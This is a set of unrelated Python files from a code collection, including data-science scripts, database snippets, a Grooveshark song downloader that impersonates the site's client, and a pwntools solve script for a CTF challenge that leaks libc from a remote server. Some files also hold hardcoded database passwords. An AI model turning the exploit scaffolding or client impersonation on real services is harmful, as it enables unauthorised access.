float(re.findall(lonpattern, content)[0])\n lat = float(re.findall(latpattern, content)[0])\n thead = float(re.findall(theadpattern, content)[0])\n sog = float(re.findall(sogpattern, content)[0])\n cog = float(re.findall(cogpattern, content)[0])\n return {'time':time_date,'source':source,'lon':lon,'lat':lat,'thead':thead,'sog':sog,'cog':cog}\n\n\n @staticmethod\n def angles(llon, llat, rlon, rlat):\n angle = 0\n dy = rlat - llat\n dx = rlon - llon\n if dx == 0 and dy > 0:\n angle = 0\n if dx == 0 and dy < 0:\n angle = 180\n if dy == 0 and dx > 0:\n angle = 90\n if dy == 0 and dx < 0:\n angle = 270\n if dx > 0 and dy > 0:\n angle = math.atan(dx / dy) * 180 / math.pi\n elif dx < 0 and dy > 0:\n angle = 360 + math.atan(dx / dy) * 180 / math.pi\n elif dx < 0 and dy < 0:\n angle = 180 + math.atan(dx / dy) * 180 / math.pi\n elif dx > 0 and dy < 0:\n angle = 180 + math.atan(dx / dy) * 180 / math.pi\n return angle\n\n @staticmethod\n def get_angle(a1, a2):\n return min(abs(a1 - a2), 360 - abs(a1 - a2))\n\n\n\n def get_feature(self,dic1,dic2,dic3,flag):\n try:\n time1 = self.get_second(dic2['time']) - self.get_second(dic1['time'])\n time2 = self.get_second(dic3['time']) - self.get_second(dic2['time'])\n except:\n time1 = int(dic2['time']) - int(dic1['time'])\n time2 = int(dic3['time']) - int(dic2['time'])\n\n source = 1 if dic1['source'] == dic2['source'] else -1\n lon1 = (dic2['lon'] - dic1['lon']) * 10000\n lat1 = (dic2['lat'] - dic1['lat']) * 10000\n lon2 = (dic3['lon'] - dic2['lon']) * 10000\n lat2 = (dic3['lat'] - dic2['lat']) * 10000\n ang1 = self.angles(dic1['lon'],dic1['lat'],dic2['lon'],dic2['lat'])\n ang2 = self.angles(dic2['lon'],dic2['lat'],dic3['lon'],dic3['lat'])\n thead1 = self.get_angle(dic1['thead'],ang1)\n thead2 = self.get_angle(dic2['thead'], ang1) # 目标点航首向和角度差\n thead3 = self.get_angle(dic2['thead'], ang2) # 目标点航首向和角度差\n thead4 = self.get_angle(dic3['thead'], ang2) # 目标点后一个点航首向和角度差\n sog1 = dic1['sog'] # 目标点前一个点的航速\n sog2 = dic2['sog'] # 目标点的航速\n sog3 = dic3['sog'] # 目标点后一个点的航速\n cog1 = dic1['cog'] # 目标点前一个点的航迹向\n cog2 = dic2['cog'] # 目标点的航迹向\n cog3 = dic3['cog'] # 目标点后一个点的航迹向\n last_is_ture = 1 if flag == 1 else -1\n # if\n # [time1, time2, source, lon1, lat1, lon2, lat2, ang1, ang2, thead1, thead2, thead3, thead4, sog1, sog2, sog3, cog1, cog2, cog3, last_is_ture]\n return [time1,time2,source,lon1,lat1,lon2,lat2,ang1,ang2,thead1,thead2,thead3,thead4,sog1,sog2,sog3,cog1,cog2,cog3,last_is_ture]\n\n @staticmethod\n def get_second(string):\n timeArray = time.strptime(string, \"%Y-%m-%d %H:%M:%S\")\n timeStamp = int(time.mktime(timeArray))\n return timeStamp\n\n\n def predict_string(self,contents):\n content_list = []\n pattern = re.compile(r'(mmsi:.*?status:\\d)')\n index1 = re.findall(pattern, contents)\n for i in index1:\n content_list.append(i)\n res_dic = dict()\n res_dic['feature'] = list()\n count = len(content_list)\n for i in range(count):\n res_dic['feature'].append(self.get_sign(content_list[i]))\n\n for i in range(count):\n if i == 0:\n res_dic['predict'] = [-1, ]\n elif i == count-1:\n res_dic['predict'].append(-1)\n else:\n features = self.get_feature(res_dic['feature'][i-1],res_dic['feature'][i],res_dic['feature'][i+1],res_dic['predict'][i-1])\n print([features])\n res_dic['predict'].append(int(self.clf.predict([features])))\n return res_dic\n\n def predict_list(self,lis):\n res_dic = dict()\n res_dic['feature'] = list()\n count = len(lis)\n for i in range(count):\n time_date = int(lis[i][7])\n source = int(lis[i][1])\n lon = float(lis[i][4])\n lat = float(lis[i][3])\n thead = float(lis[i][8])\n sog = float(lis[i][6])\n cog = float(lis[i][2])\n res_dic['feature'].append({'time': time_date, 'source': source, 'lon': lon, 'lat': lat, 'thead': thead, 'sog': sog, 'cog': cog})\n for i in range(count):\n if i == 0:\n res_dic['predict'] = [-1, ]\n res_dic['zhixin'] = [1,]\n elif i == count-1:\n res_dic['predict'].append(-1)\n res_dic['zhixin'].append(1)\n else:\n features = self.get_feature(res_dic['feature'][i-1],res_dic['feature'][i],res_dic['feature'][i+1],res_dic['predict'][i-1])\n res_dic['predict'].append(int(self.clf.predict([features])) if res_dic['feature'][i]['sog'] < 5 or features[0] < 7200 else -1)\n # res_dic['zhixin'].append(self.clf.predict_proba([features]))\n return res_dic\n\n\nif __name__ == '__main__':\n model_path = os.path.join(os.getcwd(),\"2.model\")\n m = SvcClassifition(model_path)\n a = '''mmsi: 477752100,time:2019-12-09 11:02:00,source: 9046,lon: -43.48028,lat: 3.8937933,thead: 95,sog: 10.4,cog:124.0,status:0\nmmsi: 477752100,time:2019-12-09 13:28:00,source: 300,lon: -43.18454,lat: 3.6898334,thead: 90,sog: 10.0,cog:124.6,status:0\nmmsi: 477752100,time:2019-12-09 14:04:00,source: 300,lon: -43.105392,lat: 3.6324966,thead: 20,sog: 9.8,cog:125.6,status:0\nmmsi: 477752100,time:2019-12-09 14:06:00,source: 300,lon: -43.05704,lat: 3.5951467,thead: 38,sog: 9.7,cog:127.9,status:0'''\n print(m.predict_string(a)['predict'])\n print(list(i[0] for i in list(enumerate(m.predict_string(a)['predict'])) if i[1] == 1))\n\n # [['477752100', '9046', '124.0', '3.8937933', '-43.48028', '-3', '10.4', '1575860520', '129'],\n # ['477752100', '300', '124.6', '3.6898334', '-43.18454', '7', '10.0', '1575869280', '132'],\n # ['477752100', '300', '125.6', '3.6324966', '-43.105392', '-1', '9.8', '1575871440', '132'],\n # ['477752100', '300', '127.9', '3.5951467', '-43.05704', '-3', '9.7', '1575871560', '132']]\n\n\n","sub_path":"svm_classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635676100","text":"import utilityme as utils\n\ndbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n\n# =============================================\n# MANAGE db\n# =============================================\n\n# === CREATE\n\n# --- create db\n# dbo.create_db('DB_MOUNTS')\n\n# --- create tb\n# tbname = 'targets'\n# dicts = {'id': 'INT',\n# 'name': 'CHAR',\n# 'shortname': 'CHAR',\n# 'country': 'CHAR',\n# 'lat': 'FLOAT',\n# 'lon': 'FLOAT'}\n# dbo.create_tb(dbname='DB_MOUNTS', tbname=tbname, dicts=dicts, primarykey='id')\n\n\n# === DELETE\n\n# --- delete db\n# dbo.delete_db('DB_MOUNTS')\n\n# --- delete tb\n# NB: works only if table does not have foreign key constraints\n# dbo.delete_tb(dbname='DB_MOUNTS', tbname='targets')\n\n\n# === EMPTY\n\n# --- empty tb\n# NB: works only if table does not have foreign key constraints\n# dbo.empty_tb(dbname='DB_MOUNTS', tbname='targets')\n\n\n# =============================================\n# QUERY db\n# =============================================\n\n# --- convert Records output to Tablib format, and use all of the library's functionalities:\n# dbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n# stmt = \"SELECT * FROM DB_MOUNTS.results_img WHERE target_id = '221080'\"\n# rows = dbo.execute_query(stmt)\n# tbl = rows.dataset\n# # tble.append_col([22, 20, 12, 11], header='Age') #= append new column\n\n# --- records lib simplest usage\n# db_url = 'mysql://root:br12Fol!@127.0.0.1/DB_MOUNTS'\n# dbo = records.Database(db_url)\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE target_id = 221080 ORDER BY acqstarttime DESC LIMIT 10\".format(target_id)\n# rows = dbo.query(stmt)\n# for r in rows:\n# print r.title\n# \n# - if only 1 row expected:\n# print rows.first().title\n\n# --- print content\n# dbo.print_dataset(dbname='DB_MOUNTS', tbname='targets') # , colname='prod_title')\n\n# --- get entire table dataset\n# dbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n# rows = dbo.get_dataset(dbname='DB_MOUNTS', tbname='targets')\n# for r in rows:\n# print(r.name, r.id)\n#\n# with tablib functionalities:\n# A = rows.dataset\n# A['name']\n#\n# or: rows.dataset['name']\n\n# --- get specific dataset: select elts containing specific string (ex: string '1SSV' at char nb 13)\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE SUBSTRING(title,13,4) = '1SSV'\"\n# rows = dbo.execute_query(stmt)\n# dat = rows.all()\n\n# --- get specific dataset:\n# => AND condition: SELECT * FROM table WHERE column1 = 'var1' AND column2 = 'var2';\n# => OR condition: SELECT * FROM table WHERE column1 = 'var1' OR column2 = 'var2';\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE target_id = '221080' and acqstarttime >= '2016-01-01' and acqstarttime < '2018-01-01' and orbitdirection = 'ASCENDING' and orbitdirection = 'ASCENDING' and polarization = 'VV' ORDER BY acqstarttime ASC\"\n# rows = dbo.execute_query(stmt)\n# for r in rows:\n# print(r.title)\n\n# --- sort based on foreign key\n# EX: get ifg image titles (in 'result_img' table) sorted by acquisition time (in 'archive' table)\ndb_name = 'DB_MOUNTS'\ndbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql', db_name=db_name)\n\nid = '22180'\nstmt = '''\n SELECT R.title, A.acqstarttime\n FROM results_img AS R\n INNER JOIN archive AS A\n ON R.id_master = A.id\n WHERE R.target_id = {} AND R.type = 'ifg' OR R.type = 'coh'\n ORDER BY A.acqstarttime desc\n '''\nstmt = stmt.format(88)\n\nres = dbo.execute_query(stmt)\nprint(res.dataset)\n\n\n# =============================================\n# DB_MOUNTS\n# =============================================\n\n# === store archive S1 zip files to database\n# volcanoname = 'ertaale'\n# archive_dir = '/home/sebastien/DATA/data_satellite/' + volcanoname\n# dbo.dbmounts_loadarchive(path_dir=archive_dir, print_metadata=1)\n\n# === query targets table\n# --- ex: get target id\n# volcanoname = 'ertaale'\n# stmt = \"SELECT id FROM DB_MOUNTS.targets WHERE shortname = '{}'\".format(volcanoname)\n# rows = dbo.execute_query(stmt)\n# print rows[0][0]\n\n# --- ex: get list of targets\nstmt = \"SELECT shortname FROM DB_MOUNTS.targets\"\nrows = dbo.execute_query(stmt)\nfor r in rows:\n print(r.shortname)\n","sub_path":"build/lib/mounts/snippet_database.py","file_name":"snippet_database.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359371865","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/advanced_corporate_actions/./etc/FCorpActionChoiceGuiCommon.py\"\nimport acm\nimport FBDPGui\nimport importlib\nimportlib.reload(FBDPGui)\nimport FOpenCorpActChoice\nimport FCorpActionPayoutViewer\nimport FBDPCommon\nimport FCustomTextObjectViewer\n\nael_variables = None\n\nADDITIONALINFO_RECORDTYPE = \"CorpActChoice\"\naddInfoNames = FBDPCommon.getAdditionalInfoNames(ADDITIONALINFO_RECORDTYPE)\n\ntt_Name = 'The name of the option'\ntt_CaPayoutsOids = 'list of payouts for the option'\ntt_CorpAction = 'The corporate action of this option'\ntt_Buy = 'Indicates buy as opposed to sell'\ntt_IsDefault = 'Indicate if the choice is the default one'\ntt_Oid = 'The oid of the choice'\n\ndef populateGuiFromChoice(choice, fieldValues):\n for var in ael_variables:\n if var[0] in addInfoNames:\n addinfo = choice.AddInfos()\n for i in addinfo:\n spec = i.AddInf()\n name = spec.FieldName()\n if name == var[0]:\n fieldValues[var.sequenceNumber] = i.FieldValue()\n else:\n if var[0] != 'CaPayoutsOids':\n fieldValues[var.sequenceNumber] = choice.GetProperty(var[0])\n else:\n payouts = ''\n if choice.Oid() > 0:\n for p in choice.CaPayouts():\n payouts += str(p.Oid())\n payouts += ','\n payouts = payouts[:-1]\n fieldValues[var.sequenceNumber] = payouts\n return fieldValues\n\ndef oid_cb(index, fieldValues):\n if isinstance(fieldValues[index], (int, long)):\n choice = acm.FCorporateActionChoice[fieldValues[index]]\n if choice:\n fieldValues = populateGuiFromChoice(choice, fieldValues)\n return fieldValues\n\ndef customDialog(shell, params):\n customDlg = FCorpActionPayoutViewer.PayoutsListCustomDialog(params) \n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\ndef customTextDlg(shell, params):\n customDlg = FCustomTextObjectViewer.FCustomTextObjectViewer(params)\n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\nael_variables = FBDPGui.AelVariables(\n ['Name',\n 'Name',\n 'string', None, None,\n None, 1, tt_Name, None, 1],\n ['CaPayoutsOids',\n 'Payouts',\n 'int', None, None,\n 0, 0, tt_CaPayoutsOids, None, 1, customDialog],\n ['CorpAction',\n 'Corporate Action',\n 'FCorporateAction', None, None,\n 1, 1, tt_CorpAction, None],\n ['IsDefault',\n 'IsDefault',\n 'int', ['1', '0'], 1,\n 1, 0, tt_IsDefault],\n ['Oid',\n 'Oid_hidden',\n 'string', None, None,\n None, None, tt_Oid, oid_cb],\n ['ChoiceRecord',\n 'Option Record_Advanced',\n 'FCustomTextObject', None, None,\n None, 1, None, None, 1, customTextDlg],)\n","sub_path":"Extensions/Advanced Corporate Actions/FPythonCode/FCorpActionChoiceGuiCommon.py","file_name":"FCorpActionChoiceGuiCommon.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481681168","text":"#!/usr/bin/env dls-python\nfrom adPythonPlugin import AdPythonPlugin\nimport cv2\nimport numpy\nimport logging\n\nclass Focus(AdPythonPlugin):\n def __init__(self):\n # Set a debug logging level in the local logger\n #self.log.setLevel(logging.DEBUG) \n params = dict(ksize = 3, prefilter = 0, iters = 1,\n sum = 0.0, filtered_mean = 0.0, filtered_stddev = 0.0)\n AdPythonPlugin.__init__(self, params)\n \n def paramChanged(self):\n # one of our input parameters has changed\n ksize = self[\"ksize\"]\n self.element = cv2.getStructuringElement(cv2.MORPH_OPEN, (ksize, ksize))\n self.log.info('Changed parameter, ksize=%s', str(ksize))\n\n def processArray(self, arr, attr):\n # got a new image to process\n self.log.debug(\"arr size: %s\", arr.shape)\n self.log.debug(\"parameters: %s\", str(self._params))\n \n if self['prefilter'] > 0:\n dest = cv2.morphologyEx(arr, cv2.MORPH_OPEN, self.element)\n else:\n dest = arr\n dest = cv2.morphologyEx(dest, cv2.MORPH_GRADIENT, \n self.element, iterations = self['iters'])\n #hist = numpy.histogram(dest, bins = self.params['bins'], range = (100,5000))\n #correcthist = (hist[0], hist[1][:-1])\n meanstddev = cv2.meanStdDev(dest)\n self.log.debug(\"mean stddev: %s\", str(meanstddev))\n self['filtered_mean'] = meanstddev[0][0][0]\n self['filtered_stddev'] = meanstddev[1][0][0]\n self['sum'] = cv2.sumElems(dest)[0]\n \n return dest\n\nif __name__==\"__main__\":\n Focus().runOffline()\n","sub_path":"adPythonApp/scripts/adPythonFocus.py","file_name":"adPythonFocus.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449028119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\nelf = context.binary = ELF('./bin/tvmi', checksec=True)\n# context.terminal = [\"terminator\", \"-u\", \"-e\"]\ncontext.terminal = [\"remotinator\", \"vsplit\", \"-x\"]\n\n\ndef get_conn(argv=[], *a, **kw):\n\thost = args.HOST or '198.11.180.84'\n\tport = int(args.PORT or 6666)\n\tif args.GDB:\n\t\treturn gdb.debug([elf.path] + argv, gdbscript=gdbscript, env=env, *a, **kw)\n\telif args.REMOTE:\n\t\treturn remote(host, port)\n\telse:\n\t\treturn process([elf.path] + argv, env=env, *a, **kw)\n\ngdbscript = '''\nb *tvm_vm_run\nalias sp = p *(vm.mem.registers+6)\ncontinue\n'''\ngdbscript = '\\n'.join(line for line in gdbscript.splitlines() if line and not line.startswith('#'))\nenv = {}\n\nio = get_conn(argv=['./exp.vm'])\nr = lambda x: io.recv(x)\nrl = lambda: io.recvline(keepends=False)\nru = lambda x: io.recvuntil(x, drop=True)\ncl = lambda: io.clean(timeout=1)\ns = lambda x: io.send(x)\nsa = lambda x, y: io.sendafter(x, y)\nsl = lambda x: io.sendline(x)\nsla = lambda x, y: io.sendlineafter(x, y)\nia = lambda: io.interactive()\nli = lambda s: log.info(s)\nls = lambda s: log.success(s)\n\n\nif args.REMOTE:\n\texp = open(\"./exp.vm\").read()\n\tsla(b'(< 4096) :', str(len(exp)).encode())\n\ts(exp.encode())\n\ndef tohex(val, nbits=32):\n return hex((val + (1 << nbits)) % (1 << nbits))[2:].rjust(8, '0')\n\ndef de(v):\n\treturn unhex(tohex(int(v.decode())))\n\ndef leak_libc_binary():\n\tints = io.recvall(timeout=60).decode().splitlines()\n\tints = list(map(int, ints))\n\tints = list(map(tohex, ints))\n\tints = list(map(unhex, ints))\n\traw_bytes = list(map(lambda h: h[::-1], ints))\n\traw_bytes = b''.join(raw_bytes)\n\n\twith open(\"./libc.so\", \"wb\") as f:\n\t\tf.write(raw_bytes)\n\n# leak_libc_binary()\n\n\ndef leak8():\n\tlo = de(rl())\n\thi = de(rl())\n\tlibc_leak = u64((hi+lo)[::-1])\n\tls(f\"{libc_leak:#x}\")\n\n# leak8()\n\n\nia()\n\n","sub_path":"realworld_ctf_2022/tinyvm/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25229425","text":"import csv\nimport math\n\nimpact_dict = \"./dictionaries/TrueDict.csv\"\nnonimpact_dict = \"./dictionaries/FalseDict.csv\"\nimpact_word_count = 1995\nnonimpact_word_count = 2215\ntweets = \"./tweets/final100tweets.csv\"\nres = open(\"./nb_results.txt\", \"w+\")\n\nwith open(tweets) as tweets_csv:\n tweets_reader = csv.reader(tweets_csv, delimiter=',')\n\n for t in tweets_reader:\n impact_value = 0\n nonimpact_value = 0\n impacted = False\n\n for word in t:\n if word != '' and len(word) > 3:\n with open(impact_dict) as impact_csv:\n impact_reader = csv.reader(impact_csv, delimiter=\",\")\n\n impact_value += float(math.log(1/impact_word_count))\n\n for imp_line in impact_reader:\n if imp_line[0] == word:\n impact_value += float(imp_line[1]) - float(math.log(1/impact_word_count))\n break\n #end of for\n \n with open(nonimpact_dict) as nonimpact_csv:\n nonimpact_reader = csv.reader(nonimpact_csv, delimiter=\",\")\n\n nonimpact_value += float(math.log(1/nonimpact_word_count))\n\n for nonimp_line in nonimpact_reader:\n if nonimp_line[0] == word:\n nonimpact_value += float(nonimp_line[1]) - float(math.log(1/nonimpact_word_count))\n break\n #end of for\n #end of for\n\n if impact_value > nonimpact_value:\n impacted = True\n else:\n impacted = False\n \n res.write(t[0] + \": \" + str(impacted) + \" -- \" + str(impact_value) + \" \" + str(nonimpact_value) + \"\\n\")\n print(t[0] + \": \" + str(impacted))\n \n res.close()\n\nprint('END SCRIPT')\n\n","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"629790620","text":"from NaiveBayes import Pool\nimport os\nDClasses = [\"acute\",\"allergies\",\"cancer\",\"fever\",\"heart disease\",\"signs\",\"ulcers\"]\nbase = \"learn/\"\np = Pool()\nfor i in DClasses:\n print(i)\n p.learn(base + i, i)\nbase = \"test/\"\nfor i in DClasses:\n dir = os.listdir(base + i)\n for file in dir:\n res = p.Probability(base + i + \"/\" + file)\n print(i + \": \" + file + \": \" + str(res))\ndir = os.listdir(base + f)\nfor file in dir:\n res = p.Probability(base + f + \"/\" + file)\n print(f + \": \" + file + \": \" +str(res))\n","sub_path":"nb2.py","file_name":"nb2.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"486214431","text":"import urllib2\nimport json\nimport string\nimport hashlib\nimport uuid\nimport os\nimport cookielib\nimport gzip\nimport StringIO\nimport random\nimport re\nimport math\nimport time\nimport downloadHandler\nfrom urlgrabber.keepalive import HTTPHandler\n\nclass grooveshark:\n '''Handles all the network stuff'''\n\n downloader = downloadHandler.downloadHandler()\n\n URL = \"https://grooveshark.com\"\n USERAGENT = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0\"\n COOKIEFILE = \"groovy.cookie\"\n\n jsQueue = {}\n jsQueue[\"client\"] = \"jsqueue\"\n jsQueue[\"clientRevision\"] = \"20120312.08\"\n jsQueue[\"secret\"] = \"circlesAndSquares\"\n jsQueue[\"headers\"] = {\n \"User-Agent\":USERAGENT,\n \"Host\":\"grooveshark.com\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Content-Type\":\"application/json\",\n \"Accept-Language\":\"da,en-us;q=0.7,en;q=0.3\"\n }\n\n htmlshark = {}\n htmlshark[\"client\"] = \"htmlshark\"\n htmlshark[\"clientRevision\"] = \"20120312\"\n htmlshark[\"secret\"] = \"reallyHotSauce\"\n htmlshark[\"headers\"] = {\n \"User-Agent\":USERAGENT,\n \"Host\":\"grooveshark.com\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Content-Type\":\"application/json\",\n \"Accept-Language\":\"da,en-us;q=0.7,en;q=0.3\"\n }\n\n #Setting the static header (Country, session and uuid)\n h = {}\n h[\"country\"] = {}\n h[\"country\"][\"CC1\"] = 72057594037927940\n h[\"country\"][\"CC2\"] = 0\n h[\"country\"][\"CC3\"] = 0\n h[\"country\"][\"CC4\"] = 0\n h[\"country\"][\"ID\"] = 57\n h[\"country\"][\"IPR\"] = 0\n h[\"privacy\"] = 0\n h[\"uuid\"] = str.upper(str(uuid.uuid4()))\n\n token = None\n session = None\n userTrackingID = None\n queueID = None\n cj = None\n tokenExpires = None\n\n def __init__(self):\n self.installHandlers()\n self.getSession()\n self.doCrossdomainRequest()\n self.getToken()\n self.getCountry()\n self.generateQueueID()\n\n def installHandlers(self):\n global cj\n #Install support for KeepAlive and HTTP/1.1, via urlgrabber (older versions) \n keepalive_handler = HTTPHandler()\n opener = urllib2.build_opener(keepalive_handler)\n urllib2.install_opener(opener)\n\n #Install cookielib for easy cookie management\n self.cj = cookielib.LWPCookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))\n urllib2.install_opener(opener)\n\n #Proxy stuff, used for testing, might be added at a later date\n #proxy = urllib2.ProxyHandler({\"https\":\"119.252.160.34:8000\"})\n #opener = urllib2.build_opener(proxy)\n #urllib2.install_opener(opener)\n\n def parseMainPage(self, html):\n global userTrackingID\n matchObj = re.search(r'\"userTrackingID\":[^}]*', html, re.I|re.M)\n if matchObj:\n matchObj = re.search(r\"[0123456789]+\", matchObj.group(), re.I|re.M)\n if matchObj:\n self.userTrackingID = matchObj.group()\n return\n raise SyntaxError(\"TrackingID not found\")\n\n def readSession(self):\n for cookie in self.cj:\n if cookie.name == \"PHPSESSID\":\n session = cookie.value\n return session\n return\n\n def doCrossdomainRequest(self):\n req = urllib2.Request(self.URL + \"/crossdomain.xml?20120312.08\")\n page = urllib2.urlopen(req)\n page.read()\n\n def getSession(self):\n global session\n\n if os.path.isfile(self.COOKIEFILE):\n self.cj.load(self.COOKIEFILE)\n req = urllib2.Request(self.URL)\n page = urllib2.urlopen(req)\n self.parseMainPage(page.read())\n self.session = self.readSession()\n self.cj.save(self.COOKIEFILE)\n\n def getCountry(self):\n p = {}\n p[\"header\"] = {}\n p[\"header\"][\"session\"] = self.session\n p[\"header\"][\"client\"] = self.jsQueue[\"client\"]\n p[\"header\"][\"clientRevision\"] = self.jsQueue[\"clientRevision\"]\n p[\"header\"][\"token\"] = self.generateToken(\"getCountry\", self.jsQueue[\"secret\"])\n p[\"header\"][\"privacy\"] = self.h[\"privacy\"]\n p[\"header\"][\"uuid\"] = self.h[\"uuid\"]\n p[\"method\"] = \"getCountry\"\n p[\"parameters\"] = {}\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n self.h[\"country\"] = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n\n def createHeader(self, data, client, method = None):\n data[\"header\"] = self.h\n data[\"header\"][\"session\"] = self.session\n data[\"header\"][\"client\"] = client[\"client\"]\n data[\"header\"][\"clientRevision\"] = client[\"clientRevision\"]\n if method:\n data[\"header\"][\"token\"] = self.generateToken(method, client[\"secret\"])\n data[\"method\"] = method\n return data\n\n def createRequest(self, data, client):\n return urllib2.Request(self.URL + \"/more.php?\" + data[\"method\"], json.JSONEncoder().encode(data), client[\"headers\"])\n\n def generateQueueID(self):\n global queueID\n part1 = self.userTrackingID + str(math.floor(time.time()))\n part2 = str(math.floor(random.random() * 500))\n while len(part2)<3:\n part2 = \"0\" + part2\n self.queueID = part1 + part2\n\n def generateToken(self, methodName, secret):\n if (self.tokenExpires and self.tokenExpires > time.time()):\n rnd = (''.join(random.choice(string.hexdigits) for x in range(6))).lower()\n return rnd + hashlib.sha1('%s:%s:%s:%s' % (methodName, self.token, secret, rnd)).hexdigest()\n else:\n self.getToken()\n return self.generateToken(methodName, secret)\n\n def getToken(self):\n global token, tokenExpires\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"secretKey\"] = hashlib.md5(self.session).hexdigest()\n p[\"method\"] = \"getCommunicationToken\"\n p = self.createHeader(p, self.htmlshark)\n page = urllib2.urlopen(self.createRequest(p, self.htmlshark))\n result = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n if result:\n self.tokenExpires = time.time() + (60 * 25)\n self.token = result\n else:\n raise KeyError(\"Couldn't get token\")\n\n def getResultsFromSearch(self, query, what=\"Songs\"):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"type\"] = what\n p[\"parameters\"][\"query\"] = query\n p = self.createHeader(p, self.htmlshark, \"getResultsFromSearch\")\n page = urllib2.urlopen(self.createRequest(p, self.htmlshark))\n j = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())\n try:\n return j[\"result\"][\"result\"][\"Songs\"]\n except:\n return j[\"result\"][\"result\"]\n\n def getStreamKeyFromSongIDEx(self, id):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"type\"] = 0\n p[\"parameters\"][\"mobile\"] = False\n p[\"parameters\"][\"prefetch\"] = False\n p[\"parameters\"][\"songID\"] = id\n p[\"parameters\"][\"country\"] = self.h[\"country\"]\n p = self.createHeader(p, self.jsQueue, \"getStreamKeyFromSongIDEx\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def addSongsToQueue(self, songObj, source = \"user\"): \n queueObj = {}\n queueObj[\"songID\"] = songObj[\"SongID\"]\n queueObj[\"artistID\"] = songObj[\"ArtistID\"]\n queueObj[\"source\"] = source\n queueObj[\"songQueueSongID\"] = 1\n \n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"songIDsArtistIDs\"] = []\n p[\"parameters\"][\"songIDsArtistIDs\"].append(queueObj)\n p[\"parameters\"][\"songQueueID\"] = self.queueID\n p = self.createHeader(p, self.jsQueue, \"addSongsToQueue\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def removeSongsFromQueue(self, userRemoved = True):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"songQueueID\"] = self.queueID\n p[\"parameters\"][\"userRemoved\"] = True\n p[\"parameters\"][\"songQueueSongIDs\"]=[1]\n p = self.createHeader(p, self.jsQueue, \"removeSongsFromQueue\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def markSongDownloadedEx(self, streamServer, songID, streamKey):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"streamServerID\"] = streamServer\n p[\"parameters\"][\"songID\"] = songID\n p[\"parameters\"][\"streamKey\"] = streamKey\n p = self.createHeader(p, self.jsQueue, \"markSongDownloadedEx\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def markSongQueueSongPlayed(self, streamServerID, streamKey, songID):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"streamServerID\"] = streamServerID\n p[\"parameters\"][\"streamKey\"] = streamKey\n p[\"parameters\"][\"songQueueSongID\"] = 1\n p[\"parameters\"][\"songQueueID\"] = self.queueID\n p[\"parameters\"][\"songID\"] = songID\n p = self.createHeader(p, self.jsQueue, \"markSongQueueSongPlayed\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def download(self, search, choice, callBack = None):\n try:\n songid = int(choice)\n except:\n raise SyntaxError(\"Failed to convert choice to int\")\n\n \n self.addSongsToQueue(search[songid]) #Add the song to the queue\n \n stream = self.getStreamKeyFromSongIDEx(search[songid][\"SongID\"]) #Get the StreamKey for 